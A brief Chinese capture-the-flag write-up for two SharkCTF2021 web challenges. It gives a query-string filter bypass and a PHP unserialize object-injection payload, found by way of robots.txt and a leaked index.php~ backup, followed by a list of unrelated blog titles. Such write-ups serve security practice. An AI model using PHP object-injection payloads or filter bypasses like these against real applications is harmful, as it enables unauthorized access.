SharkCTF2021 bybypass&baby_phpserialize题记
2024-10-19 18:38:12
(国庆褪10天了 先水一篇)
bybypass:
payload:?anime_is_bae=hehellotherehoomanllotherehooman
baby_phpserialize
robots.txt看到flag和index.php~
后者有源码:
f12看 否则会漏东西
根据源码,
构造payload: ?exp=O:4:"hehe":1:{s:1:"a";s:4:"flag";}
最新文章
- Java–cvc-complex-type.4:Attribut ‘version’ must appear on element ‘web-app’
- [Linux] mail 命令,进入邮箱及删除邮件
- css 常见时间轴的做法(————————————————时间轴——————————————————)
- Spring Security笔记:自定义登录页
- HDU 5791 Two DP
- nginx学习
- [置顶] 我的设计模式学习笔记------>;Java设计模式总概况
- Windows命令行(DOS命令)教程-7 (转载)http://arch.pconline.com.cn//pcedu/rookie/basic/10111/15325_6.html
- Ubuntu 麒麟版下安装:Apache+php5+mysql+phpmyadmin.
- 浅解ARC中的 __bridge、__bridge_retained和__bridge_transfer
- JavaSE 教程的选择
- .NET Core多平台开发体验[2]: Mac OS X
- Orchard详解--第六篇 CacheManager 2
- Vue2 学习笔记4
- Cocos Creator的类别
- java 中,如何获取文件的MD5值呢?如何比较两个文件是否完全相同呢?
- Angular4学习笔记(二)-在WebStorm中启动项目
- jquery ajax 全局事件
- code first 创建数据库,add-migration update-database
- day7回顾